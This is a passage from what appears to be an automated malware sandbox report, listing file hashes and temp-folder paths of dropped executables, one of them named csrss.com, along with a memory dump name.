| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/1072-81-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ZcaqngYeMJ.com
| MD5 | 09cc8b02108c2ca6db6197e37b165a65 |
| SHA1 | 9f245c5206ce171cfc288ed8bf05896d1b36a1f0 |
| SHA256 | 89ad1822d2ee2d5e39d2e4aae2016562244f7ea43071c192e8989a3c2544d998 |
| SHA512 | d50c20b554dd85996f8b7432fb3d3668c3fbfcd77314a4adc476861373a0350b122be61ab1aa087153e45c48cf6a453d0829ccfa4786cf679ee3dccb7cffadae |